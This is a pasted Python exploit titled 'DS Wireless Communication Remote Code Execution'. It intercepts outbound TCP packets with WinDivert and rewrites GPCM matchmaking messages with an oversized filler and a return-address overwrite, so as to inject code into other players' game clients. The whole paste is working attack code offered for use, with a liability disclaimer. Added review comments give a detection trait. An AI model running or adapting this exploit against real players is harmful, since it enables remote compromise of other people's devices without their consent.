
DS Wireless Communication Remote Code Execution

a guest
Nov 19th, 2023
Python 2.40 KB | Cybersecurity | 0 0
  1. """This code will inject arbitrary code into a client's game.
  2.  
  3. You are fully responsible for all activity that occurs while using this code.
  4. The author of this code can not be held liable to you or to anyone else as a
  5. result of damages caused by the usage of this code.
  6. """
  7.  
  8. __author__ = 'MikeIsAStar'
  9. __date__ = '19 Nov 2023'
  10.  
  11. import re
  12. import sys
  13.  
# Refuse to start on interpreters older than the minimum the script declares.
if not sys.version_info >= (3, 10):
    sys.exit('This program requires Python 3.10 or above !')

# pydivert is the only third-party dependency; exit with a readable message
# instead of a traceback when it is missing.
try:
    import pydivert
except ModuleNotFoundError:
    sys.exit("The 'pydivert' module is not installed !")
  21.  
  22.  
# Constants
# Single byte written directly after the matched message header; the author
# names it an invalid match command.
DWC_MATCH_COMMAND_INVALID = b'\xFE'
# Filler length in bytes for each handled matching version (556 and 572).
DWC_MATCHING_VERSION_3_PADDING_LENGTH = 0x22C
DWC_MATCHING_VERSION_11_PADDING_LENGTH = 0x23C
# Terminator appended to the end of every rewritten message.
FINAL_KEY = b'\\final\\'
# Capture filter: every outbound TCP packet with a non-empty payload is
# diverted, not only game traffic.
WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'

# Variables
# Four bytes written immediately after the filler. As shipped this is the
# pattern 0x41414141 ('AAAA').
# NOTE(review): the name suggests these bytes overlay a saved link register in
# the receiving client; that cannot be confirmed from this file.
LR_SAVE = b'\x41\x41\x41\x41'
assert len(LR_SAVE) == 4
# Repeating unit for the filler; it must be non-empty because the filler
# length is divided by len(PADDING).
PADDING = b'MikeStar'
assert len(PADDING) >= 1
  35.  
  36.  
def try_modify_gpcm_message(payload):
    r"""Return a rewritten copy of *payload* if it holds a handled GPCM match message.

    The payload is searched for ``\msg\GPCM<version>vMAT``, where the version
    is one or two digits and does not start with 0. Only versions 3 and 11
    are rewritten. For any other version a notice is printed and None is
    returned. None is also returned when the pattern is absent.

    A rewritten payload keeps everything up to the end of the matched header
    and discards the rest. In its place go the DWC_MATCH_COMMAND_INVALID
    byte, a fixed-length filler built by repeating PADDING, the four LR_SAVE
    bytes and the ``\final\`` terminator.

    NOTE(review): the oversized body presumably overruns a fixed-size buffer
    in the receiving client. The receiver's code is not visible here, so
    treat that as an assumption. For defenders, the observable trait is a
    vMAT message with command byte 0xFE followed by more than 0x22C bytes of
    body. A receiver that checks the body length before copying would reject
    it.
    """
    found = re.search(rb'\\msg\\GPCM([1-9][0-9]?)vMAT', payload)
    if found is None:
        return None

    version = int(found.group(1))
    if version == 3:
        fill_size = DWC_MATCHING_VERSION_3_PADDING_LENGTH
    elif version == 11:
        fill_size = DWC_MATCHING_VERSION_11_PADDING_LENGTH
    elif version == 90:
        print('Modifying GPCM90vMAT messages is not supported !')
        return None
    else:
        print(f'Modifying GPCM{version}vMAT messages is not yet supported !')
        return None

    # Repeat the unit once more than strictly needed, then cut to exact size.
    repeats = fill_size // len(PADDING) + 1
    filler = (PADDING * repeats)[:fill_size]

    # Everything after the matched header is dropped and replaced.
    header = payload[:found.end()]
    rewritten = header + DWC_MATCH_COMMAND_INVALID + filler + LR_SAVE + FINAL_KEY

    print(f'Modified a GPCM{version}vMAT message !')

    return rewritten
  65.  
  66.  
def main():
    """Divert outbound TCP traffic and re-send it, rewriting matching messages.

    A WinDivert handle is opened with WINDIVERT_FILTER, so every outbound TCP
    packet with a payload on this host passes through the loop. Each packet
    is offered to try_modify_gpcm_message. When a replacement payload comes
    back it is swapped in. Every packet is then re-sent, modified or not.

    Ctrl+C ends the loop quietly. A PermissionError exits with a message
    saying administrator privileges are required.
    """
    try:
        with pydivert.WinDivert(WINDIVERT_FILTER) as handle:
            for pkt in handle:
                replacement = try_modify_gpcm_message(pkt.payload)
                if replacement is not None:
                    pkt.payload = replacement
                # Diverted packets do not continue on their own, so unmodified
                # ones are sent as well.
                handle.send(pkt)
    except KeyboardInterrupt:
        # Interrupting from the keyboard is the normal way to stop.
        return
    except PermissionError:
        sys.exit('This program must be run with administrator privileges !')


if __name__ == '__main__':
    main()